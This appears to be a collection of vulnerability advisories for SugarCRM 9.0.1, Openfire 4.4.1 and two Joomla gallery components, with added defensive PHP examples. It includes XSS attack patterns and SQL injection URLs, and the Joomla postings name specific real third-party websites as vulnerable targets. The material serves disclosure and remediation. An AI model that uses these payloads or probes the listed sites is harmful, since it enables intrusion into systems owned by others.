SugarCRM 9.0.1 Path Traversal


SugarCRM versions 9.0.1 and below suffer from multiple path traversal vulnerabilities.


MD5 | 07e61544723cdaf57099f0133cbf81e8

---------------------------------------------------------
SugarCRM <= 9.0.1 Multiple Path Traversal Vulnerabilities
---------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 9.0.1 and prior versions, 8.0.3 and prior versions.


[-] Vulnerabilities Description:

1) User input passed to the "/Mail/attachment" REST API endpoint is not properly sanitized before being used to delete a file from the system. This can be exploited by malicious users to delete arbitrary files via Path Traversal attacks. Please note this vulnerability could be exploited to delete the 'config.php' file and re-install the application, potentially leading to a full server compromise.

2) User input passed through the "temp_id" parameter to the "/[module]/temp/file" REST API endpoint is not properly sanitized before being used to download/delete a file from the system. This can be exploited by malicious users to download and/or delete arbitrary files via Path Traversal attacks. Please note this vulnerability could be exploited to download and delete the 'config.php' file and re-install the application, potentially leading to a full server compromise.

3) User input passed through the "dropdown_lang" parameter when handling the "wizard" action within the "Studio" module is not properly sanitized before being used in a call to the include() PHP function. This can be exploited by malicious users to upload and execute arbitrary PHP code via Path Traversal attacks. Successful exploitation of this vulnerability requires a user account with Developer access to any module.

4) User input passed through the "filename" parameter when handling the "deleteFont" action within the "Configurator" module is not properly sanitized before being used to delete a file from the system. This can be exploited by malicious users to delete arbitrary files. Please note this vulnerability could be exploited to delete the 'config.php' file and re-install the application, potentially leading to a full server compromise. Successful exploitation of this vulnerability requires a System Administrator account.


[-] Solution:

Upgrade to version 9.0.2, 8.0.4, or later.


[-] Disclosure Timeline:

[07/02/2019] - Vendor notified
[01/10/2019] - Versions 9.0.2 and 8.0.4 released
[10/10/2019] - Publication of this advisory


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-06


[-] Other References:

https://support.sugarcrm.com/Documentation/Sugar_Versions/9.0/Ent/Sugar_9.0.2_Release_Notes



SugarCRM 9.0.1 PHP Code Injection


SugarCRM versions 9.0.1 and below suffer from multiple PHP code injection vulnerabilities.


MD5 | 1138730283969f03621d804b3942381f

-------------------------------------------------------------
SugarCRM <= 9.0.1 Multiple PHP Code Injection Vulnerabilities
-------------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 9.0.1 and prior versions, 8.0.3 and prior versions.


[-] Vulnerabilities Description:

1) When handling the "Locale" action within the "Administration" module, the application allows arbitrary settings to be injected into the 'config_override.php' file. This can be exploited by malicious users to inject and execute arbitrary PHP code by, for example, setting the file extension of the system log file to .php. Successful exploitation of this vulnerability requires a System Administrator account.

2) When handling the "SaveRelationship" action within the "ModuleBuilder" module, the application allows arbitrary settings to be injected into the 'config_override.php' file. This can be exploited by malicious users to inject and execute arbitrary PHP code by, for example, setting the file extension of the system log file to .php.

3) When handling the "PasswordManager" action within the "Administration" module, the application allows arbitrary settings to be injected into the 'config_override.php' file. This can be exploited by malicious users to inject and execute arbitrary PHP code by, for example, setting the file extension of the system log file to .php. Successful exploitation of this vulnerability requires a System Administrator account.

4) When handling the "saveadminwizard" action within the "Configurator" module, the application allows arbitrary settings to be injected into the 'config_override.php' file. This can be exploited by malicious users to inject and execute arbitrary PHP code by, for example, setting the file extension of the system log file to .php. Successful exploitation of this vulnerability requires a System Administrator account.

5) When handling the "trackersettings" action within the "Trackers" module, the application allows arbitrary settings to be injected into the 'config_override.php' file. This can be exploited by malicious users to inject and execute arbitrary PHP code by, for example, setting the file extension of the system log file to .php.

6) When handling the "updatewirelessenabledmodules" action within the "Administration" module, the application allows arbitrary settings to be injected into the 'config_override.php' file. This can be exploited by malicious users to inject and execute arbitrary PHP code by, for example, setting the file extension of the system log file to .php. Successful exploitation of this vulnerability requires a System Administrator account.
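All six findings share one root cause: request parameters are written into config_override.php without restricting which settings may be set or what values they may hold, so a log file extension of .php turns the log into a script the web server will execute. As an added example (not SugarCRM's code), the PHP below shows the shape of a safe writer for such a file: only allow-listed setting names are accepted, the log file name and extension are validated against fixed patterns, and the file is rendered with var_export() instead of splicing raw strings into PHP source. The setting names (logger.file.name and so on), the class and the validators are hypothetical; only the $sugar_config array name comes from the advisories.

```php
<?php
// Added example (not SugarCRM code): an allow-list driven writer for a
// config override file. Setting names and validators are hypothetical.
declare(strict_types=1);

final class ConfigOverrideWriter
{
    private const ALLOWED_SETTINGS   = ['logger.file.name', 'logger.file.ext', 'logger.level'];
    private const ALLOWED_LOG_EXTS   = ['log', 'txt'];
    private const ALLOWED_LOG_LEVELS = ['debug', 'info', 'warn', 'error', 'fatal'];

    /**
     * Reduce a raw settings array (e.g. from $_POST) to allow-listed keys whose
     * values pass validation. Unknown keys and bad values are reported, never written.
     *
     * @return array{accepted: array<string,string>, rejected: array<string,string>}
     */
    public static function filter(array $raw): array
    {
        $accepted = [];
        $rejected = [];
        foreach ($raw as $key => $value) {
            $key = (string)$key;
            if (!in_array($key, self::ALLOWED_SETTINGS, true)) {
                $rejected[$key] = 'unknown setting';
            } elseif (!is_string($value)) {
                $rejected[$key] = 'value must be a string';
            } elseif (($error = self::validate($key, $value)) !== null) {
                $rejected[$key] = $error;
            } else {
                $accepted[$key] = $value;
            }
        }
        return ['accepted' => $accepted, 'rejected' => $rejected];
    }

    /** Per-key validation; returns an error message, or null when the value is acceptable. */
    private static function validate(string $key, string $value): ?string
    {
        switch ($key) {
            case 'logger.file.name':
                // Base name only: no separators and no dots, so the name cannot
                // smuggle in a directory or a second extension.
                return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $value)
                    ? null : 'only letters, digits, "_" and "-" (1..64 chars) are allowed';
            case 'logger.file.ext':
                $ext = strtolower(ltrim($value, '.'));
                return in_array($ext, self::ALLOWED_LOG_EXTS, true)
                    ? null : 'extension must be one of: ' . implode(', ', self::ALLOWED_LOG_EXTS);
            case 'logger.level':
                return in_array(strtolower($value), self::ALLOWED_LOG_LEVELS, true)
                    ? null : 'unknown log level';
        }
        return 'no validator for setting';
    }

    /** Render the file body with var_export(), never by splicing raw strings into PHP source. */
    public static function render(array $accepted): string
    {
        $body = "<?php\n// generated file; do not edit by hand\n";
        foreach ($accepted as $key => $value) {
            $body .= '$sugar_config[' . var_export($key, true) . '] = '
                   . var_export($value, true) . ";\n";
        }
        return $body;
    }
}

// Constructed request mirroring the advisory's technique: the log file
// extension set to .php, plus a key that is not part of the allow-list.
$request = [
    'logger.file.name' => 'sugarcrm',
    'logger.file.ext'  => '.php',
    'logger.level'     => 'info',
    'cache_dir'        => '../',
];

$result = ConfigOverrideWriter::filter($request);
print_r($result['rejected']);                  // logger.file.ext and cache_dir are rejected
echo ConfigOverrideWriter::render($result['accepted']);
```

The allow-list is the important part: a writer that accepts any key name lets a privileged request reach settings the form never exposed, which is exactly what the six actions above do. Validating the extension alone would not be enough, because a file name such as "sugarcrm.php" with extension "log" still ends in a non-executable suffix only if the two are joined in the expected order, so the name is restricted to characters that cannot form a second extension.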


[-] Solution:

Upgrade to version 9.0.2, 8.0.4, or later.


[-] Disclosure Timeline:

[07/02/2019] - Vendor notified
[01/10/2019] - Versions 9.0.2 and 8.0.4 released
[10/10/2019] - Publication of this advisory


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-07


[-] Other References:

https://support.sugarcrm.com/Documentation/Sugar_Versions/9.0/Ent/Sugar_9.0.2_Release_Notes



SugarCRM 9.0.1 PHP Object Injection


SugarCRM versions 9.0.1 and below suffer from multiple PHP object injection vulnerabilities.


MD5 | 7b2fd6425395925d0bd77736e7cd43cc

---------------------------------------------------------------
SugarCRM <= 9.0.1 Multiple PHP Object Injection Vulnerabilities
---------------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 9.0.1 and prior versions, 8.0.3 and prior versions.


[-] Vulnerabilities Description:

1) The vulnerability exists because the "/modules/Emails/DetailView.php" script is using the unserialize() function with the "campaign_data" field of the table, and such a value can be arbitrarily manipulated through the "save2" action. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.

2) The vulnerability exists because the "/modules/EmailMan/views/view.config.php" script is using the unserialize() function with the "$sugar_config['email_xss']" variable, and such a value can be arbitrarily manipulated through the "Configurator" module. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires a System Administrator account.

3) User input passed through the "ext4" parameter when handling the "RefreshField" action within the "ModuleBuilder" module (when the "type" parameter is set to "enum") is not properly sanitized before being used in a call to the unserialize() function. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires a user account with Developer access to any module.

4) User input passed through the "ext4" parameter when handling the "RefreshField" action within the "ModuleBuilder" module (when the "type" parameter is set to "multienum") is not properly sanitized before being used in a call to the unserialize() function. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires a user account with Developer access to any module.

5) The vulnerability exists because the "SubPanelDefinitions::get_hidden_subpanels()" method is using the unserialize() function with the "MySettings_hide_subpanels" setting variable, and such a value can be arbitrarily manipulated through the "MergeRecords" module. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.

6) The vulnerability exists because the "TabController::get_system_tabs()" method is using the unserialize() function with the "MySettings_tab" setting variable, and such a value can be arbitrarily manipulated through the "MergeRecords" module. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.

7) The vulnerability exists because the "OpportunitySetup::setConfigSetting()" method is using the unserialize() function with the "MySettings_hide_subpanels" setting variable, and such a value can be arbitrarily manipulated through the "MergeRecords" module. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.

8) The vulnerability exists because the "PackageManager::getinstalledPackages()" method is using the unserialize() function with the "manifest" field of the 'upgrade_history' table, and such a value can be arbitrarily manipulated through the "MergeRecords" module. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires a System Administrator account.

9) The vulnerability exists because the "UpgradeSavedSearch::__construct()" method is using the unserialize() function with the "contents" field of the 'saved_search' table, and such a value can be arbitrarily manipulated through the "MergeRecords" module. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.

10) The vulnerability exists because the "UserPreference::reloadPreferences()" method is using the unserialize() function with the "contents" field of the 'user_preferences' table, and such a value can be arbitrarily manipulated through the "MergeRecords" module. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.

11) The vulnerability exists because the "TeamSetManager::cleanUp()" method is using the unserialize() function with the "contents" field of the 'user_preferences' table, and such a value can be arbitrarily manipulated through the "MergeRecords" module. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires a user account with Admin access to the Users/Teams/Roles modules.

12) User input passed through the "$_FILES['VKFile']" parameter when handling the "LicenseSettings" action within the "Administration" module is not properly sanitized before being used in a call to the unserialize() function within the "check_now()" function. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires a System Administrator account.

13) The vulnerability exists because the "/modules/Administration/Updater.php" script is using the unserialize() function with the "license_latest_versions" setting variable, and such a value can be arbitrarily manipulated in different ways. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.

14) The vulnerability exists because the "/modules/Administration/metadata/adminpaneldefs.php" script is using the unserialize() function with the "license_latest_versions" setting variable, and such a value can be arbitrarily manipulated in different ways. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.

15) The vulnerability exists because the "authenticateDownloadKey()" function is using the unserialize() function with the "license_validation_key" setting variable, and such a value can be arbitrarily manipulated in different ways. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.
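Every one of the fifteen findings is the same sink: unserialize() called on data an authenticated user can influence, whether through a database field, a stored preference, an uploaded file or a request parameter. The added PHP example below (not SugarCRM's code; the DemoGadget class and the helper names are constructed for the demo) shows the two defensive options a practitioner would reach for: calling unserialize() with allowed_classes set to false and refusing any payload that still contains an object, and moving new data paths to JSON, which carries no class information at all. The MySettings_tab key in the constructed blob is taken from finding 6; its content is made up.

```php
<?php
// Added example (not SugarCRM code): a hardened wrapper around unserialize()
// for data that is only ever supposed to hold scalars and arrays.
declare(strict_types=1);

/**
 * Decode serialized preferences/subpanel lists/manifests. Any object in the
 * payload is rejected instead of instantiated, so no __wakeup()/__destruct()
 * gadget chain can run.
 */
function unserializeScalarOnly(string $data): array
{
    // allowed_classes => false (PHP >= 7.0): every O:/C: token becomes a
    // __PHP_Incomplete_Class placeholder rather than a live instance.
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== 'b:0;') {
        throw new InvalidArgumentException('malformed serialized data');
    }
    if (containsObject($value)) {
        throw new InvalidArgumentException('serialized payload contains an object');
    }
    return is_array($value) ? $value : ['value' => $value];
}

/** Recursively look for (incomplete) objects anywhere inside the decoded value. */
function containsObject($value): bool
{
    if (is_object($value)) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (containsObject($item)) {
                return true;
            }
        }
    }
    return false;
}

/** The replacement for new code paths: JSON has no notion of a class at all. */
function decodePreferences(string $json): array
{
    $value = json_decode($json, true, 32, JSON_THROW_ON_ERROR);
    if (!is_array($value)) {
        throw new InvalidArgumentException('preferences must be a JSON object or array');
    }
    return $value;
}

// Stand-in for any application class with a dangerous magic method.
// Constructed for the demo; it only records whether it was woken up.
final class DemoGadget
{
    public static bool $woken = false;
    public string $cmd = '';
    public function __wakeup(): void { self::$woken = true; }
}

// Constructed inputs: a legitimate preference blob and one smuggling an object.
$benign  = serialize(['MySettings_tab' => ['Home', 'Accounts'], 'theme' => 'RacerX']);
$hostile = 'a:1:{s:3:"tab";O:10:"DemoGadget":1:{s:3:"cmd";s:2:"id";}}';

var_dump(unserializeScalarOnly($benign)['MySettings_tab']);   // array('Home', 'Accounts')

try {
    unserializeScalarOnly($hostile);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";       // serialized payload contains an object
}
var_dump(DemoGadget::$woken);          // bool(false): __wakeup() never ran

var_dump(decodePreferences('{"MySettings_tab":["Home","Accounts"]}')['MySettings_tab']);
```

allowed_classes is the minimum fix where the storage format cannot change, because it removes the instantiation step that every object-injection chain depends on; the containsObject() pass then makes a smuggled object a hard error rather than a silently ignored placeholder. Where the schema is under your control, the JSON path is preferable, since there is nothing in the format for a future code change to re-enable.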


[-] Solution:

Upgrade to version 9.0.2, 8.0.4, or later.


[-] Disclosure Timeline:

[07/02/2019] - Vendor notified
[01/10/2019] - Versions 9.0.2 and 8.0.4 released
[10/10/2019] - Publication of this advisory


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-08


[-] Other References:

https://support.sugarcrm.com/Documentation/Sugar_Versions/9.0/Ent/Sugar_9.0.2_Release_Notes



SugarCRM 9.0.1 Phar Deserialization


SugarCRM versions 9.0.1 and below suffer from multiple phar deserialization vulnerabilities.


MD5 | 9b8f9b6b6a519339498cc83d2af280ce

---------------------------------------------------------------
SugarCRM <= 9.0.1 Multiple Phar Deserialization Vulnerabilities
---------------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 9.0.1 and prior versions, 8.0.3 and prior versions.


[-] Vulnerabilities Description:

1) User input passed through the "backup_dir" parameter when handling the "Backups" action within the "Administration" module is not properly sanitized before being used in a file operation. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection via phar:// stream wrapper), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires a System Administrator account.

2) User input passed through the "file_name" parameter when handling the "step3" action within the "Import" module is not properly sanitized before being used in a file operation. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection via phar:// stream wrapper), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.

3) User input passed through the "importFile" parameter when handling the "RefreshMapping" action within the "Import" module is not properly sanitized before being used in a file operation. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection via phar:// stream wrapper), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.

4) User input passed through the "load_module_from_dir" parameter when handling the "UpgradeWizard" action within the "Administration" module is not properly sanitized before being used in a file operation. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection via phar:// stream wrapper), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires a System Administrator account.

5) User input passed through the "file_name" parameter when handling the "UploadFileCheck" action within the "UpgradeWizard" module is not properly sanitized before being used in a file operation. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope (PHP Object Injection via phar:// stream wrapper), allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.
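Findings 1 through 5 here, and findings 1, 2 and 4 of the path traversal advisory above, are both failures to confine a user-supplied file name: with ../ the name escapes the intended directory, and with a phar:// prefix PHP unserializes the archive's metadata as soon as a function such as file_exists() or is_dir() touches the path, before any later check runs. The following PHP is an added example, not SugarCRM's code, of one confinement routine that closes both cases; the function name confinedPath(), the temporary fixture directories and the sample inputs are constructed for the demo.

```php
<?php
// Added example (not SugarCRM code): confine a user-supplied file name to one
// directory and refuse stream wrappers before any filesystem call touches it.
declare(strict_types=1);

/**
 * Resolve $userPath relative to $baseDir and return the canonical absolute
 * path, or null when the request must be refused. Refusals cover:
 *  - NUL bytes (they truncate the path in the underlying C call),
 *  - any URL scheme such as phar://, which would make file_exists()/is_dir()
 *    unserialize Phar metadata before the path is even checked,
 *  - traversal out of $baseDir via ../ or symlinks (realpath() canonicalises),
 *  - files that do not exist (realpath() returns false).
 */
function confinedPath(string $baseDir, string $userPath): ?string
{
    if ($userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }
    // A "scheme:" prefix selects a stream wrapper; a local file name never needs one.
    if (preg_match('#^[A-Za-z][A-Za-z0-9+.\-]*:#', $userPath)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($candidate === false) {
        return null;
    }
    // Compare against the base plus a separator so that "/var/app/uploads2"
    // cannot pass for base "/var/app/uploads", and the base itself is refused.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// If the application never legitimately opens .phar archives, removing the
// wrapper process-wide closes the phar:// vector independently of later bugs.
if (in_array('phar', stream_wrappers(), true)) {
    stream_wrapper_unregister('phar');
}

// Constructed fixture: a temporary "uploads" directory with one file, and a
// sibling config.php one level up that must stay out of reach.
$root   = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'confined_demo_' . getmypid();
$upload = $root . DIRECTORY_SEPARATOR . 'uploads';
mkdir($upload, 0700, true);
file_put_contents($upload . DIRECTORY_SEPARATOR . 'report.csv', "a,b\n");
file_put_contents($root . DIRECTORY_SEPARATOR . 'config.php', "<?php // constructed\n");

$attempts = [
    'report.csv',                 // allowed
    '../config.php',              // traversal: refused
    'phar://report.csv/x.txt',    // stream wrapper: refused
    "report.csv\0.jpg",           // NUL byte: refused
    'missing.csv',                // does not exist: refused
];
foreach ($attempts as $p) {
    $resolved = confinedPath($upload, $p);
    printf("%-26s => %s\n", addcslashes($p, "\0"), $resolved ?? 'REFUSED');
}

// Remove the fixture.
unlink($upload . DIRECTORY_SEPARATOR . 'report.csv');
unlink($root . DIRECTORY_SEPARATOR . 'config.php');
rmdir($upload);
rmdir($root);
```

The order of the checks matters: the scheme test runs before realpath() or any other filesystem function sees the string, because the phar:// trigger is the filesystem call itself, not a later read. For endpoints that take an opaque identifier such as "temp_id" rather than a file name, the stricter alternative is to look the identifier up in a table and never let it touch a path at all. Unregistering the phar wrapper is a per-deployment decision; a process that is itself started from a .phar (common for CLI tooling) needs it.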


[-] Solution:

Upgrade to version 9.0.2, 8.0.4, or later.


[-] Disclosure Timeline:

[07/02/2019] - Vendor notified
[01/10/2019] - Versions 9.0.2 and 8.0.4 released
[10/10/2019] - Publication of this advisory


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-09


[-] Other References:

https://support.sugarcrm.com/Documentation/Sugar_Versions/9.0/Ent/Sugar_9.0.2_Release_Notes



Openfire 4.4.1 Cross Site Scripting


Openfire version 4.4.1 suffers from multiple cross site scripting vulnerabilities.


MD5 | 6df9e588043a5bbb075dc74e95e760fb

Information
--------------------

Advisory by Netsparker
Name: Multiple Cross-site Scripting Vulnerabilities in Openfire 4.4.1
Affected Software: Openfire
Affected Versions: 4.4.1
Vendor Homepage: https://www.igniterealtime.org/
Vulnerability Type: Cross-site Scripting
Severity: Medium
Status: Fixed
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Netsparker Advisory Reference: NS-19-015

Technical Details
--------------------

URL : http://{DOMAIN}/setup/setup-datasource-standard.jsp
Parameter Name : driver
Parameter Type : POST
Attack Pattern : x%22+onmouseover%3dnetsparker(0x003276)+x%3d%22

URL : http://{DOMAIN}/setup/setup-datasource-standard.jsp
Parameter Name : password
Parameter Type : POST
Attack Pattern : x%22+onmouseover%3dnetsparker(0x003403)+x%3d%22

URL : http://{DOMAIN}/setup/setup-datasource-standard.jsp
Parameter Name : serverURL
Parameter Type : POST
Attack Pattern : x%22+onmouseover%3dnetsparker(0x0033A0)+x%3d%22

URL : http://{DOMAIN}/setup/setup-datasource-standard.jsp
Parameter Name : username
Parameter Type : POST
Attack Pattern : x%22+onmouseover%3dnetsparker(0x003213)+x%3d%22

For more information:
https://www.netsparker.com/web-applications-advisories/ns-19-015-reflected-cross-site-scripting-in-openfire/


Regards,

Daniel Bishtawi
Marketing Administrator | Netsparker Web Application Security Scanner
Follow us on Twitter <https://twitter.com/netsparker> | LinkedIn
<https://www.linkedin.com/company/netsparker-ltd> | Facebook
<https://facebook.com/netsparker>
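The four findings above are attribute-context injections: the submitted value lands inside value="..." of a form field, and the scanner's pattern closes that quote so that onmouseover becomes a new attribute. The PHP below is an added example, not Openfire's code (Openfire is a Java application), that reproduces the vulnerable and the hardened rendering side by side and uses an HTML parser to show what a browser would actually see; the function names are constructed for the demo and the payload is the advisory's own pattern for the driver parameter.

```php
<?php
// Added example (not Openfire code): attribute-context output encoding,
// checked with an HTML parser rather than by eyeballing the markup.
declare(strict_types=1);

/** Attribute-safe encoding: quotes, angle brackets and ampersands become entities. */
function escapeAttr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Vulnerable pattern: the submitted value is echoed straight into the attribute. */
function inputTagUnsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

/** Hardened pattern: every dynamic value goes through escapeAttr(). */
function inputTagSafe(string $name, string $value): string
{
    return '<input type="text" name="' . escapeAttr($name) . '" value="' . escapeAttr($value) . '">';
}

/**
 * Parse the rendered tag the way a browser would and list every attribute
 * whose name starts with "on". An empty list means the payload stayed text.
 */
function eventHandlerAttributes(string $html): array
{
    $doc = new DOMDocument();
    // Warnings suppressed: libxml complains about fragments but parses them.
    @$doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    $input = $doc->getElementsByTagName('input')->item(0);
    $found = [];
    if ($input !== null) {
        foreach ($input->attributes as $attr) {
            if (stripos($attr->name, 'on') === 0) {
                $found[] = $attr->name;
            }
        }
    }
    return $found;
}

// The POST parameter as the servlet container decodes it (pattern from the advisory).
$payload = urldecode('x%22+onmouseover%3dnetsparker(0x003276)+x%3d%22');

$unsafe = inputTagUnsafe('driver', $payload);
$safe   = inputTagSafe('driver', $payload);

echo $unsafe, "\n";   // value="x" onmouseover=netsparker(0x003276) x="" : a new attribute
echo $safe, "\n";     // value="x&quot; onmouseover=netsparker(0x003276) x=&quot;" : inert text
print_r(eventHandlerAttributes($unsafe));   // Array ( [0] => onmouseover )
print_r(eventHandlerAttributes($safe));     // Array ( )
```

The encoding function must match the context: ENT_QUOTES is what makes the double quote inert here, and a value placed in a JavaScript string, a URL or a CSS block would need a different encoder. Parsing the result, as eventHandlerAttributes() does, is also a practical way to turn the scanner's attack pattern into a regression test for the fix.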

Joomla SwPhotoGallery 1.5.26 SQL Injection


Joomla SwPhotoGallery component version 1.5.26 suffers from a remote SQL injection vulnerability.


MD5 | 15dcba3b8b1e4c9269724d2eaf34748b

###################################################################

# Exploit Title : Joomla SwPhotoGallery 1.5.26 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : joomla.org
# Affected Versions : 1.5.16 and 1.5.26
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Joomla SWPhotoGallery is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in the application's database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_swphotogallery&lang=fr&location=[SQL Injection]

/index.php?option=com_swphotogallery&lang=dk&location=[SQL Injection]&view=gallery

###################################################################

# Example Vulnerable Sites :
*************************
[+] madeira-live.com/index.php?option=com_swphotogallery&lang=fr&location=1%27

###################################################################

# Example SQL Database Error :
****************************
No valid database connection You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to
use near ''' at line 1 SQL=SELECT alias FROM `jos_swphotogallery_locations`
WHERE `id` = 1

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################

Joomla Cactus 1.2.0 SQL Injection


Joomla Cactus component version 1.2.0 suffers from a remote SQL injection vulnerability.


MD5 | 24d4e4ed19ed5e713f4a2c2e04eea8f4

###################################################################

# Exploit Title : Joomla 1.5.15 Cactus 1.2.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : anatoliasystems.com
# Joomla Affected Versions : 1.5.4 and 1.5.15
# Software Affected Version : 1.2.0
# /administrator/components/com_cactus/com_cactus.xml
# Software Information Links :
# joomlacode.org/gf/project/cactus/
# 100cms.org/extension/joomla/2559-Cactus
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Description about Software :
***************************
Cactus is a practical, comfortable, fast and simple picture gallery component for Joomla.

###################################################################

# Impact :
***********
Joomla Cactus is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in the application's database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_cactus&album=[SQL Injection]

/index.php?option=com_cactus&album=[ID-NUMBER]&limit=[SQL Injection]

###################################################################

# Example Vulnerable Sites :
*************************
[+] indusfonte.com/site/index.php?option=com_cactus&album=1%27

[+] elena-artstudio.de/index.php?option=com_cactus&album=1%27

###################################################################

# Example SQL Database Error :
****************************
No valid database connection You have an error in your SQL syntax; check the manual
that corresponds to your MariaDB server version for the right syntax to use near 'ORDER
BY jos_cactus.line LIMIT 0,9' at line 13 SQL=SELECT jos_cactus.id, jos_cactus.name,
jos_cactus.caption, jos_cactus_album.path, jos_cactus_album.vpath, jos_cactus_album.tpath
FROM jos_cactus, jos_cactus_album WHERE jos_cactus.albumid = jos_cactus_album.id
AND jos_cactus_album.publish = 1 AND jos_cactus.publish = 1 AND
jos_cactus.albumid = ORDER BY jos_cactus.line LIMIT 0,9

###################################################################

